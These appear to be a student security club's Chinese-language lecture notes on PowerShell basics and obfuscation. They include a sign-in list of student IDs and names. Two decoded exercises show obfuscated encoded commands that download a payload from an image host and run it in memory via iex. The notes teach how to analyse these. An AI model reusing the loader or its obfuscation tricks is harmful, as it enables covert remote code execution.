# 第五次社課 ###### tags: `1091` ::: danger 今天要紙本簽到喔 :point_down: ::: ::: success 線上簽到說你/妳紙本簽到了~ B063040059 陳縵欣 B093011029 吳庠憲 M083140001 張郢展 B063012015 賴亭諭 M093140010 王品媛 B063040013 李洳瑄 B063040046 徐彥庭 B083040036 蔡明霖 M093140005 黃庭筠 M093140016 謝昌勝 M093140017 張守中 B083040037 黃琮閔 M093010066 謝佳翰 B073040019 蔡孟師 B093040027 施采廷 B093040004 廖藝涵 M083140005 曾煜鈞 B062030001 江逸軒 M081050006 陳羿君 M083040031 許雅雯 M094020042 林永盛 M094020044 紀韋辰 B093040016 高聖傑 B073040047 楊志璿 B093040044 蔡明軒 M083140006 莫閔勛 M083140007 陳信傑 M074020035 黃嵩育 B093012033 王勤 B093012009 黃柏翰 ::: 主題：PowerShell 講者: Still Slide: [link](https://1drv.ms/p/s!AjOrJMOIR6BMjcAublJeRAjqy-mxPQ?e=XPsYpZ) LICENSE CC-BY-SA ## Powershell types * Powershell (pwsh/powershell) * windows 7 以上開始支援， windows 10 預設 shell * Powershell core (pwsh) * 跨平台 (e.g. Linux) base on .NET Core ## Powershell 特性 * 可接受經過 base64 編碼後的指令( Encoded Commands )--><font color=red> super cool</font> * e.g. `powershell.exe -noprofile - enc "base64編碼"` * .NET call * e.g. `[System.Console]::WriteLine("Hello World!")` * [.NET API](https://docs.microsoft.com/zh-tw/dotnet/api/) * incredible hacker tools * execute the code without accessing disk spaces * and the MS doesn't know about what going on but a shell script ## Powershell 用途 * Could call the Win32 API * 呼叫及建立 .NET 物件 * 執行 .NET call or method * 查看 OS 的環境變數 * `env` 指令 ## Powershell Basic Commands * 指令準則 * Powershell Command are called "cmdlets" * 指令不分大小寫 * 查看指令：`get-verb`, `get-alias` * 設定指令別名： `set-alias [縮寫] [指令名]` * 跳脫字元是 \` 而非 \\ 字元 * e.g. echo `n * ls * cd * rm * Get-Verb * verb + group * group * Common * Data * Lifecycle * Diagnostic * Security * Communications * Other * Get-Alias * cat -> Get-Content * ls -> Get-ChildItem * `$_` * `ls | %{rm $_ }` * env * `$env:ProgramFiles` * `$env:comspec` * `$env:ProgramFiles[9] + $env:ProgramFiles[14] + $env:comspec[7]` * ls env: 取得系統環境變數 * powershell -? * iex (字串串接成一個指令) 即可讓powershell執行字串內容 * Invoke-Expression * 有一定危險性 * ex: iex ($env:ProgramFiles[9] + $env:ProgramFiles[13]) = 執行ls (if ProgramFiles[9]==l & $env:ProgramFiles[13]==s) * `help [Command Name]` (相當於 Linux 系統的 `man 指令`) * 執行 .NET call ``` > [System.Text.Encoding]::utf8.getbytes("asdf") ``` ``` > $a = [System.Text.Encoding]::utf8.getbytes("asdf") > [System.Convert]::ToBase64String($a) YXNkZg== ``` ## 用 powershell 寫一個 "Hello World!" (歡迎大家分享自己ㄉ寫法) * 用 echo ```powershell echo "Hello World!" ``` * 用 .NET calls (C#) ```powershell [System.Console]::WriteLine("Hello World!`n") ``` * String Concatenation ```powershell "Hello " + "World!`n" ``` ## Encoded Commands 可用 base64 編碼作為script執行 ## .NET calls https://paste.stillu.cc/v/6722109161853984769#JxWY+0tbiT16awDn11gykd5txCAt7Scgh/Z+d3c8I00= https://www.base64decode.org/ ## Exercise 1 題目 ```= powershell.exe -noprofile -enc "JAB3AGMAIAA9ACAAWwBzAFkAUwB0AEUATQAuAG4AZQB0AC4AVwBFAEIAQwBMAEkAZQBOAHQAXQA6ADoAbgBlAFcAKAApADsAIAAkAEYAcwAgAD0AIABbAFMAWQBzAHQARQBNAC4AaQBPAC4AbQBlAE0AbwByAFkAUwBUAHIARQBBAG0AXQAkAFcAYwAuAGQATwB3AE4ATABvAGEAZABkAGEAdABBACgAJwBoAHQAVABwAFMAOgAvAC8AJwArACAAJABlAG4AVgA6AHAAcgBvAGcAUgBBAE0ARgBJAGwAZQBzAFsAMQAyAF0AIAArACAAJwAuAGkAYgBiAC4AJwArACAAJABFAG4AdgA6AEMAbwBtAHMAcABFAEMAWwAyADAAXQArACcATwAvAFQAMgB2ACcAKwBbAEMASABBAFIAXQA1ADcAKwAnADYAMgBaAC8AZQB2AEkAbAAtAFAAQQBZAGwATwBBAEQALgBQACcAKwAkAEUATgB2ADoAYwBvAE0AcwBQAGUAYwBbADUAXQArACAAJwBnACcAKQA7ACAAJABGAFMALgBzAGUARQBrACgAMABYADIAZAA3ADgALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBTAEUARQBLAE8AUgBJAEcAaQBuAF0AOgA6AEIARQBnAEkAbgApADsAIAAkAGcAegBrAGsAagB3ACAAPQAgAFsAQgBZAHQAZQBbAF0AXQA6ADoATgBFAFcAKAAwAHgANAA3ACkAOwAgACQAZgBzAC4AUgBlAGEARAAoACQAZwB6AGsAawBqAHcALAAgADAALAAgACQAZwB6AGsAawBqAHcALgBsAEUATgBHAFQAaAApADsAIAAkAGYAcwAuAGMAbABvAHMARQAoACkAOwBbAFMAWQBTAHQARQBNAC4AVABlAFgAdAAuAGUATgBjAE8ARABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIASQBuAEcAKAAkAGcAegBrAGsAagB3ACkAfABJAGUAWAA=" ``` base64結果 ```powershell= $wc = [sYStEM.net.WEBCLIeNt]::neW(); $Fs = [SYstEM.iO.meMorYSTrEAm]$Wc.dOwNLoaddatA('htTpS://'+$enV:progRAMFIles[12] + '.ibb.'+ $Env:ComspEC[20]+'O/T2v'+[CHAR]57+'62Z/evIl-PAYlOAD.P'+$ENv:coMsPec[5]+ 'g'); $FS.seEk(0X2d78, [System.IO.SEEKORIGin]::BEgIn); $gzkkjw = [BYte[]]::NEW(0x47); $fs.ReaD($gzkkjw, 0, $gzkkjw.lENGTh); $fs.closE();[SYStEM.TeXt.eNcODing]::UTF8.GETSTrInG($gzkkjw)|IeX ``` ``` line 2: htTpS://i.ibb.cO/T2v962Z/evIl-PAYlOAD.PNg https://i.ibb.co/t2v962z/evil-payload.png ``` 這段程式碼是在做： 1. 建立一個 web client 2. 用這個 web client 從這一個網址去下載一個 png byte array 到 memory stream 3. 從開頭偏移 0X2d78 讀檔的指標(?) 有點像 C 語言的`fseek()` 4. 創一個新的長度為 0x47 的 byte array 物件，叫做 $gzkkjw 5. 從這個偏移的檔案指標讀 0x47 個 bytes 到 $gzkkjw 6. 把檔案關掉 7. 用 iex 執行 $gzkkjw 這東西 ## Exercise 2 題目 ``` SQBFAHgAKABbAHMAVAByAEkATgBnAF0AOgA6AGoAbwBJAG4AKAAgACcAJwAsACgAWwByAEUARwBlAHgAXQA6ADoATQBBAFQAYwBoAEUAcwAoACAAIgAgACkAIAApACcAJAAnACwAKQA2ADUAXQByAGEASABDAFsAKwA3ADUAXQByAGEASABDAFsAKwA0ADUAXQByAGEASABDAFsAKAAoAEUAYwBBAGwAcABlAFIALgApADQAMwBdAHIAYQBIAEMAWwBdAGcATgBJAHIAVABTAFsALAAnAFgAMgB6ACcAKABFAGMAQQBsAHAAZQBSAC4AKQAnAFgAMgB6AGcAZQBwAGoALgAnACsAJwBRADMAWgBMAG0AbgBKAC8AbQBvAGMAJwArACcALgByAHUAZwAnACsAJwBtAGkALgBpACcAKwAnAC8ALwA6ACcAKwAnAHMAcAB0AHQAJwArACcAaABYADIAegAgAD0AJwArACcAIABsACcAKwAnAHIAVQBlAGcAYQAnACsAJwBtAGkAOAA5ADYAJwAoACgAIAApACcAJwBuAEkATwBqAC0AJwBYACcAKwBdADMALAAxAFsAKQBlAGMATgBFAFIARQBmAGUAUgBQAGUAcwBPAEIAUgBlAHYAJABdAEcATgBpAFIAdABTAFsAKAAgACgAIAAmACIAIAAsACAAJwAuACcAIAAsACAAJwBSAEkAZwBIAFQAVABPAEwARQBmAHQAJwAgACkAIAB8ACAARgBPAHIARQBhAGMAaAAtAG8AQgBqAGUAYwB0ACAAewAkAF8ALgBWAGEAbAB1AEUAfQAgACkAIAApACAAKQA7AC4AIAAoACAAJABFAE4AdgA6AGMATwBtAFMAcABFAEMAWwA0ACwAMQA1ACwAMgA1AF0ALQBqAG8ASQBOACcAJwApACAAKAAgAG4AZQBXAC0AbwBiAEoAZQBDAFQAIAAgAHMAeQBTAFQAZQBNAC4AaQBPAC4AcwBUAFIAZQBBAE0AcgBFAEEARABlAFIAKAAoACAAbgBlAFcALQBvAGIASgBlAEMAVAAgAEkAbwAuAEMATwBNAFAAcgBFAHMAUwBJAG8ATgAuAEQARQBmAGwAQQB0AEUAcwBUAFIARQBhAG0AKABbAEkAbwAuAE0AZQBtAG8AUgB5AHMAVAByAGUAYQBtAF0AIABbAEMAbwBOAHYARQByAFQAXQA6ADoAZgBSAE8ATQBiAEEAUwBlADYANABTAFQAUgBJAE4AZwAoACAAJwBVADYAawB1AFMAUABCAFAAUwB6AEIATQBUAEsAOQBWAHMARgBWAFEAQwB2AEMAbwBOAHYAQwBJAHQAegBSAHcAaQBRAGQAUwBHAGEAbgBKADIAZgBHAEcANQBxAGIAeABhAFkAWQA1AHIAagBtAHUAcABxAGEAMQBTAGcAQQA9ACcAKQAgACwAIABbAGkATwAuAEMAbwBNAHAAcgBlAFMAcwBpAG8AbgAuAGMATwBNAFAAcgBFAFMAcwBpAE8ATgBtAE8AZABFAF0AOgA6AGQAZQBDAE8AbQBQAFIARQBTAHMAKQApACAALABbAFQARQBYAHQALgBFAE4AYwBvAEQAaQBuAEcAXQA6ADoAQQBzAEMASQBpACkAIAApAC4AUgBFAEEAZABUAG8ARQBuAGQAKAAgACkAOwAkAHcAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdABdADoAOgBuAGUAdwAoACkAOwAkAHcAcwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABpAG0AYQBnAGUAVQByAGwALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAARgBpAGwAZQBOAGEAbQBlACgAKQAgACkAOwBpAGUAeAAgACgAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIAAoACIAdwBSACIAIAArACAAKAAoAGcAaQAgAEUAbgBWADoAcABVAGIAYABMAGAAaQBjACkALgB2AGEAbAB1AGUAWwAgACgAWwBNAGEAdABoAF0AOgA6AHIAbwB1AG4AZAAoACAAWwBJAG4AdABdADoAOgBNAGEAeABWAGEAbAB1AGUAIAAvADEAMAAxADIAMwA5ADMAMgAxACkAIAAtACAAOQApACAAKwAgACgAKABbAGkAbgB0AF0AOgA6AE0AYQB4AFYAYQBsAHUAZQAgACUAIABbAGkAbgB0AF0AOgA6AE0AaQBuAFYAYQBsAHUAZQAgACUAIABbAGkAbgB0AF0AWwBjAGgAYQByAF0AMgApACkAXQAgACkAIAArACAAIgB0AGUAIgArACAAWwBjAGgAYQByAF0ANAA1ACAAKwAiAE8AdQAqACIAKQApAC4AQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAgACsAIAAnACIAJwAgACsAIAAoACgAZwB2ACAAKAAnAHAATwBmACcAKwAgACgAKABbAGwAbwBuAGcAXQA6ADoATQBhAHgAVgBhAGwAdQBlAC0AWwBpAG4AdABdADoAOgBNAGEAeABWAGEAbAB1AGUAKQAuAHQAbwBzAHQAcgBpAG4AZwAoACkAWwAxADYAXQApACAAKwAgACcAYQBnACcAKQApAC4AdgBhAGwAdQBlACkAIAArACcAIgAnACkAIAA+ACAAJABuAHUAbABsAA== ``` base64結果 ```powershell= IEx([sTrINg]::joIn( '',([rEGex]::MATchEs( " ) )'$',)65]raHC[+75]raHC[+45]raHC[((EcAlpeR.)43]raHC[]gNIrTS[,'X2z'(EcAlpeR.)'X2zgepj.Q3ZLmnJ/moc.rugmi.i//:sptthX2z = lrUegami896'(( )''nIOj-'X'+]3,1[)ecNEREfeRPesOBRev$]GNiRtS[( ( &" , '.' , 'RIgHTTOLEft' ) | FOrEach-oBject {$_.ValuE} ) ) ); . ($ENv:cOmSpEC[4,15,25]-joIN'') ( neW-obJeCT sySTeM.iO.sTReAMrEADeR(( neW-obJeCT Io.COMPrEsSIoN.DEflAtEsTREam([Io.MemoRysTream][CoNvErT]::fROMbASe64STRINg( 'U6kuSPBPSzBMTK9VsFVQCvCoNvCItzRwiQdSGanJ2fGG5qbxaYY5rjmupqa1SgA=') , [iO.CoMpreSsion.cOMPrESsiONmOdE]::deCOmPRESs)) ,[TEXt.ENcoDinG]::AsCIi) ).REAdToEnd( ); $ws = [System.Net.WebClient]::new(); $ws.DownloadFile($imageUrl, [System.IO.Path]::GetTempFileName() ); $iex ((Get-Command ("wR" + ((gi EnV:pUb`L`ic).value[ ([Math]::round( [Int]::MaxValue /101239321) - 9) + (([int]::MaxValue % [int]::MinValue % [int][char]2))] ) + "te"+ [char]45 +"Ou*")).CmdletBinding + '"' + ((gv ('pOf'+ (([long]::MaxValue-[int]::MaxValue).tostring()[16]) + 'ag')).value) +'"') > $null ``` ``` line 1: assign the string to url https://i.imgur.com/JnmLZ3Q.jpeg ``` ``` line 6: gi -> Get-Item iex ((Get-Command ("wRite-ou*")... gv -> Get Variable ``` > PH{0H_90D_0H_heck_175_f1lElE55} --- 頁尾交流區 > WHERE IS THE "SLIDE"?? > https://1drv.ms/p/s!AjOrJMOIR6BMjcAublJeRAjqy-mxPQ?e=XPsYpZ :+1: 技術文件在哪? > https://docs.microsoft.com/en-us/dotnet/api/